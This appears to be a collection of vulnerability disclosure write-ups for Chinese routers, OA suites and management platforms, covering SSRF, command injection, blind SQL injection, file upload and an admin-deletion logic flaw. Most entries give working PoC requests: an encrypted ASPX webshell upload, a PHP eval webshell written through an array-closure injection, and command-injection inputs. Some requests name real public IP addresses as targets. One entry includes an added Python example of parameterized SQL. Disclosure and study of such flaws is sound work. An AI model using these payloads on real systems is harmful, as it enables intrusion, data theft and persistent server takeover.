├── DaHua..md
├── sql_inject.md
├── tengda.md
├── RG-BCR860.md
├── RG-EW1200G.md
├── sql_inject_3.md
├── sql_inject_2.md
├── S85F.md
├── rce.md
├── Weaver.md
├── sql_inject_4.md
├── sql_inject_5.md
├── wanjiang.md
├── ForU-CMS.md
├── tongda.md
└── SimField.md

/DaHua..md:
--------------------------------------------------------------------------------
SSRF vulnerability in the front end of the Zhejiang Dahua Smart Park comprehensive management platform

official website: https://www.dahuatech.com/

CNVD Number: CNVD-2023-36128

```PAYLOAD: /ipms/imageConvert/image?fileUrl=http://khxjyl.dnslog.cn/1.jpg```

![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/2e990791-c41f-4f73-8438-18d46e144d22)

DNSLOG shows the resulting callback

![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/515e3850-c9af-40fb-8b34-a4a3e978ccb2)

--------------------------------------------------------------------------------
/sql_inject.md:
--------------------------------------------------------------------------------
SQL injection vulnerability exists in ibos oa v4.5.5

Version: 4.5.5

official website: http://www.ibos.com.cn/

1. Log in to the background, go to email => Draft box => Delete draft, and capture the request
![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/d9213f56-967d-4a38-b847-628527b70412)
![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/6a73f20d-da27-40c9-bfea-1d7183a5878b)

2. The delay succeeds
![WPS image (3)](https://github.com/RCEraser/cve/assets/131632691/adf23c94-8a58-4abf-8138-5587a6d19b51)

--------------------------------------------------------------------------------
/tengda.md:
--------------------------------------------------------------------------------
The Tenda AC15 router has a command execution vulnerability

Firmware download address: https://www.tenda.com.cn/download/detail-2680.html

version: AC15

Analysis of the routes shows that the deviceName parameter is controllable, so the command is executed

![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/656018d0-1eff-41e8-be29-52265b675f29)

Payload
```
http://x.x.x.x/goform/setUsbUnload?deviceName=`echo '111'`>/tmp/bb.txt`
```

![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/9041de24-aea8-4cc0-a9f3-86aedd9032f5)

--------------------------------------------------------------------------------
/RG-BCR860.md:
--------------------------------------------------------------------------------
The RG-BCR860 router has command execution vulnerabilities

official website: https://www.ruijie.com.cn/

version: RG-BCR860

1. Log in to the background

![(1)](https://github.com/RCEraser/cve/assets/131632691/56c7a3c5-a227-45ef-844d-e937a875dd01)

![(2)](https://github.com/RCEraser/cve/assets/131632691/ac7bf7f4-da22-4c80-8c82-ebf9118cb45a)

2. Enter 127.0.0.1 in the Network Diagnostic-tracert check box. "cat /etc/passwd" to run the command
![(3)](https://github.com/RCEraser/cve/assets/131632691/b161804a-cd15-46fc-8858-c68c94c567ef)

--------------------------------------------------------------------------------
/RG-EW1200G.md:
--------------------------------------------------------------------------------
The RG-EW1200G router has a command execution vulnerability

official website: https://www.ruijie.com.cn/

version: RG-EW1200G

1. Open the website, right-click and inspect the page. Select Network and find 09 df2a9e44ab48766f5f. Js, then search for the /main path and enter it in the address bar. The administrative password can be changed there, and after logging out, the changed password can be used to log in.

![Image 1](https://github.com/RCEraser/cve/assets/131632691/59833f9b-ab5d-4019-854e-a0a250b00940)

![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/13e913c8-82f4-4ebe-9d1e-a1dd4782d4a6)

![WPS image (3)](https://github.com/RCEraser/cve/assets/131632691/950c7887-b40e-47e2-a9f5-f4b8c37e2e22)

2. Log in to the system, locate More Tools, then Network Tools; the command execution vulnerability is in the ping detection function

![WPS image (4)](https://github.com/RCEraser/cve/assets/131632691/f77d1ba2-057e-46f1-8a9e-e5d952cf4203)


3. ||echo `ipconfig`

![WPS image (5)](https://github.com/RCEraser/cve/assets/131632691/1f383d23-6446-4103-bb81-0ae6ed06dfde)

--------------------------------------------------------------------------------
/sql_inject_3.md:
--------------------------------------------------------------------------------
SQL injection vulnerability exists in tongda oa v2017

version: 2017

Route: general/hr/manage/staff_relatives/delete.php

There is an injected parameter: $RELATIVES_ID

The code here is simple: when $RELATIVES_ID is not empty, the parameter is concatenated directly into the SQL statement. Because the value sits inside parentheses, closing the parenthesis provides a bypass.

![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/71670d34-ca27-4d73-a803-97bb2243669c)

We can use Cartesian product blind injection. The following payload determines that the first character of the database name is t, because the delay succeeds at 116, and ASCII 116 corresponds to the lowercase letter t. In this way, the database name and any database information can be obtained through blind injection.

POC
```
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
```
![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/af257358-ab7b-4cd9-b114-333f9dbcc493)

--------------------------------------------------------------------------------
/sql_inject_2.md:
--------------------------------------------------------------------------------
SQL injection vulnerability exists in ibos oa

official website: http://www.ibos.com.cn/

version: 4.5.5

Function point: Background management => Address book management => Post management => Delete post function
![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/7e2c164b-fc2a-492b-8fcf-b3415c0e3265)

POC

Route: r=dashboard/position/del

The injection parameter id exists

If the input is normal, the following information is displayed
![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/9dd187c3-9b68-43a0-ab17-b6accc8cc669)
Stacked injection delay succeeds
![WPS image (3)](https://github.com/RCEraser/cve/assets/131632691/c9522a07-78af-4238-ad9f-3eb8d27e5f21)
The module layer deleteAll() method is invoked through the actionDel() method to execute the SQL statement.
![WPS image (4)](https://github.com/RCEraser/cve/assets/131632691/6947a225-81c0-4f9d-a665-e07a9bec97d7)
![WPS image (5)](https://github.com/RCEraser/cve/assets/131632691/b7b2e03d-3d8f-476d-9c31-93b06ae60eff)
![WPS image (6)](https://github.com/RCEraser/cve/assets/131632691/7f921357-a407-4427-af22-bddc3446e57b)

--------------------------------------------------------------------------------
/S85F.md:
--------------------------------------------------------------------------------
The Smart S85F management platform has an RCE vulnerability

official website: https://www.byzoro.com/

version: Smart S85F

![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/76e88d7a-223d-4ec2-a7b1-a88480830c86)

Construct the file parameter value ``/etc/`sleep${IFS}10`.pcap``, base64-encode it, and pass it as the file parameter; the system command is executed successfully

POC
```
GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
Host: 103.121.164.62:8443
Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```

![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/1b0c9a57-f6b4-4e58-b3f2-c74f54bdfdfc)

![WPS image (3)](https://github.com/RCEraser/cve/assets/131632691/6ff4f302-dd5b-4112-845f-d8b7ae8d839f)

--------------------------------------------------------------------------------
/rce.md:
--------------------------------------------------------------------------------
The Smart S85F management platform has an RCE vulnerability

official website: https://www.byzoro.com/

version: Smart S85F

As shown in the login interface

Construct the URL; the download succeeds. Then construct the POC; the command executes successfully

![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/a1165784-f866-448a-963b-9f62be8444b1)

https://60.29.117.204:8443/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn

POC
```
POST /app/sys1.php HTTP/1.1
Host: 60.22.74.195:8443
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id
```
![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/4084458a-d982-46ab-9cd5-516ccde25696)

--------------------------------------------------------------------------------
/Weaver.md:
--------------------------------------------------------------------------------
Weaver E-Office v9.5 has an arbitrary file upload vulnerability

official website: https://www.e-office.cn/

POC
```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: xx:8088
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php@"
Content-Type: image/jpeg


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```
verification

![WPS image (1)](https://user-images.githubusercontent.com/131632691/234152011-123b5f73-6efc-47f1-b753-3e06a4ae6c11.png)

![WPS image (2)](https://user-images.githubusercontent.com/131632691/234152039-b6b3a7b2-7c09-4e1f-ba30-5285e2b1783a.png)

--------------------------------------------------------------------------------
/sql_inject_4.md:
--------------------------------------------------------------------------------
SQL injection vulnerability exists in Tongda OA v2017 and later versions 11.10

version: v2017 and v11.10 or later

1.

Routing: general/hr/salary/welfare_manage/delete.php

There is an injected parameter: $WELFARE_ID

The code here is simple: when $WELFARE_ID is not empty, the parameter is concatenated directly into the SQL statement. Because the value sits inside parentheses, closing the parenthesis provides a bypass.
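
The pattern described for `$RELATIVES_ID` and `$WELFARE_ID` (a request value pasted inside the parentheses of the statement), shown beside a hardened form. This is an added example, not Tongda OA code: the table, the `IN (...)` query shape and the function names are assumptions, since the real source appears only in the screenshots, and SQLite stands in for the product's database.

```python
import re
import sqlite3

_ID = re.compile(r"[0-9]{1,10}")


def make_db():
    """In-memory stand-in table with three constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE welfare (welfare_id INTEGER PRIMARY KEY, item TEXT)")
    db.executemany("INSERT INTO welfare VALUES (?, ?)",
                   [(1, "meal"), (2, "travel"), (3, "housing")])
    return db


def delete_concatenated(db, welfare_id):
    """Assumed vulnerable shape: the request value is pasted inside IN (...)."""
    if welfare_id == "":
        return 0
    sql = "DELETE FROM welfare WHERE welfare_id IN (" + welfare_id + ")"
    return db.execute(sql).rowcount


def parse_id_list(raw):
    """Accept only a comma-separated list of decimal ids; reject anything else."""
    ids = []
    for part in raw.split(","):
        part = part.strip()
        if not _ID.fullmatch(part):
            raise ValueError("invalid id list element: %r" % part)
        ids.append(int(part))
    return ids


def delete_parameterized(db, welfare_id):
    """Hardened form: validate the list, then bind every id as a parameter."""
    ids = parse_id_list(welfare_id)
    marks = ",".join("?" for _ in ids)
    sql = "DELETE FROM welfare WHERE welfare_id IN (" + marks + ")"
    return db.execute(sql, ids).rowcount


def demo():
    # Same closing-parenthesis shape as the page's payload, with a harmless
    # always-false condition: the caller's text becomes part of the WHERE clause.
    probe = "1) AND (0)=(1"
    out = {
        "concat_normal": delete_concatenated(make_db(), "1,2"),
        "concat_probe": delete_concatenated(make_db(), probe),
        "param_normal": delete_parameterized(make_db(), "1,2"),
    }
    try:
        delete_parameterized(make_db(), probe)
        out["param_probe"] = "executed"
    except ValueError:
        out["param_probe"] = "rejected"
    return out


if __name__ == "__main__":
    print(demo())
```

In the concatenated form the row with id 1 exists but is not deleted, because the injected condition decided the outcome; that caller-controlled condition is what the time-based payloads on this page build on.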

![Image 1](https://github.com/RCEraser/cve/assets/131632691/dde9b679-4bb9-4061-917a-4250db54c4c5)

2. Payload

We can use Cartesian product blind injection. The following payload determines that the first character of the database name is t, because the delay succeeds at 116, and ASCII 116 corresponds to the lowercase letter t. In this way, the database name and any database information can be obtained through blind injection.

POC
```
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
```
![Image 2](https://github.com/RCEraser/cve/assets/131632691/c762a965-9a50-4ff3-acd3-dc9ce983ab90)

When 116 is changed to 115 there is no delay, which confirms the SQL injection.

```
1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
```
![Image 3](https://github.com/RCEraser/cve/assets/131632691/babef685-deca-428f-8adc-ad8630cc8aab)

--------------------------------------------------------------------------------
/sql_inject_5.md:
--------------------------------------------------------------------------------
Unauthorized SQL injection vulnerability exists in Tongda OA

version: v2017 and versions below v11.10

Routing: general/system/approve_center/flow_guide/flow_type/set_print/delete.php

There is an injected parameter: $DELETE_STR

The code here is very concise. When $DELETE_STR is not empty, the parameter is spliced directly into the SQL statement. Because the value sits inside parentheses, closing the parenthesis provides a bypass.
![Image 1](https://github.com/RCEraser/cve/assets/131632691/5ecfdddf-10f1-4830-bff2-5a829c449fcd)

We can use Cartesian product blind injection. The following payload determines that the first character of the database name is t, because the delay succeeds at 116, and ASCII code 116 corresponds to the lowercase letter t. By analogy, the database name and any information about the database can be obtained through blind injection.
POC
```
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
```
![Image 2](https://github.com/RCEraser/cve/assets/131632691/a1a25a4b-fd0b-483b-bbd7-1a34b5e14c68)

When 116 is changed to 115 there is no delay, indicating the existence of SQL injection.

POC
```
1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
```
![Image 3](https://github.com/RCEraser/cve/assets/131632691/bdd74f71-91a0-426b-b4b9-fae20f173d24)

--------------------------------------------------------------------------------
/wanjiang.md:
--------------------------------------------------------------------------------
Flash flood disaster monitoring and warning system 2.0 has an arbitrary file upload vulnerability

official website: http://www.cdwanjiang.com/

version: 2.0

Chengdu Wanjiang Gangli Technology Co., LTD. - Mountain flood disaster monitoring and early warning system 2.0 has a serious arbitrary file upload vulnerability, which allows server permissions to be obtained without authorization.


POC
```
POST /App_Resource/UEditor/server/upload.aspx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJa5U4zOAfmJDcYxj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 541

------WebKitFormBoundaryJa5U4zOAfmJDcYxj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
------WebKitFormBoundaryJa5U4zOAfmJDcYxj--
```


![WPS image (1)](https://github.com/RCEraser/cve/assets/131632691/6690e5d0-cf55-46f9-9f51-ee5b527aad68)
![WPS image (2)](https://github.com/RCEraser/cve/assets/131632691/b36b9817-fed1-4808-8400-00f2ed7d2aaa)

--------------------------------------------------------------------------------
/ForU-CMS.md:
--------------------------------------------------------------------------------
A logic flaw in ForU-CMS allows deletion of the underlying administrator

download: https://gitee.com/sw1981/ForU-CMS

version: dev Official version

1. When deleting the underlying administrator, it prompts that it cannot be deleted.

![image](https://github.com/RCEraser/cve/assets/131632691/6730775c-fcf0-42bf-9045-115a675255e0)


2. Use burp to capture packets and change the del parameter value to 1.X to directly delete the underlying administrator account and bypass back-end restrictions.

POC
```
GET /admin/cms_admin.php?del=1.2 HTTP/1.1
Host: www.forucms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://www.forucms.com/admin/cms_admin.php
Cookie: cms[mail_size]=40; token_user=61646d696e2b31; PHPSESSID=7to756v150s0h9ib4a93t4tcr4; cms[url_back]=http%3A%2F%2Fwww.forucms.com%2Findex.php
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 1.1.1.1
X-Originating-IP: 1.1.1.1
X-Remote-IP: 1.1.1.1
X-Remote-Addr: 1.1.1.1
```

![image](https://github.com/RCEraser/cve/assets/131632691/7bffdfdb-dc44-4331-bf81-4bbc6339684f)

![image](https://github.com/RCEraser/cve/assets/131632691/91399f52-ca85-43e0-9807-b541ab130bdd)

3. After the underlying administrator is deleted, all functions become unavailable.
![image](https://github.com/RCEraser/cve/assets/131632691/9738f8d9-9899-4655-b89b-6010ed3ff12a)

4. Because the code uses the intval() function, 1.x can be supplied as the del argument to bypass the back-end restriction and remove the underlying administrator directly.
![image](https://github.com/RCEraser/cve/assets/131632691/9899ca04-e90a-493d-83cd-bfffe84d3a9b)

--------------------------------------------------------------------------------
/tongda.md:
--------------------------------------------------------------------------------
Tongda OA v11.10 has an unauthorized arbitrary file upload vulnerability

official website: https://www.tongda2000.com/

version: v11.10

1. The actionGetdata() method exists in the code general\appbuilder\modules\portal\controllers\GatewayController.php, where the activeTab parameter is controllable. In line 2018 the activeTab argument is in the GetData method.

![WPS image (1)](https://user-images.githubusercontent.com/131632691/236481314-252c56c0-e488-4523-bb24-3d56b149fbbf.png)

The GetData() method looks up the id argument with findall to check whether the array exists; if the queried id exists, execution enters the if statement on line 21. The $attribute argument on line 38 is therefore controllable, so the array can be closed and data written to a file via fwrite().

![WPS image (2)](https://user-images.githubusercontent.com/131632691/236481926-d2a3976d-8c18-46eb-b3e0-59602a4861df.png)

2. Reproducing the vulnerability

poc

```
http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage
```

![WPS image (3)](https://user-images.githubusercontent.com/131632691/236482594-8413af7a-b2be-414d-b505-6e2168315c80.png)

PHP files are written with fwrite(fopen()) through array closure, and global filtering is bypassed with no parameter.

```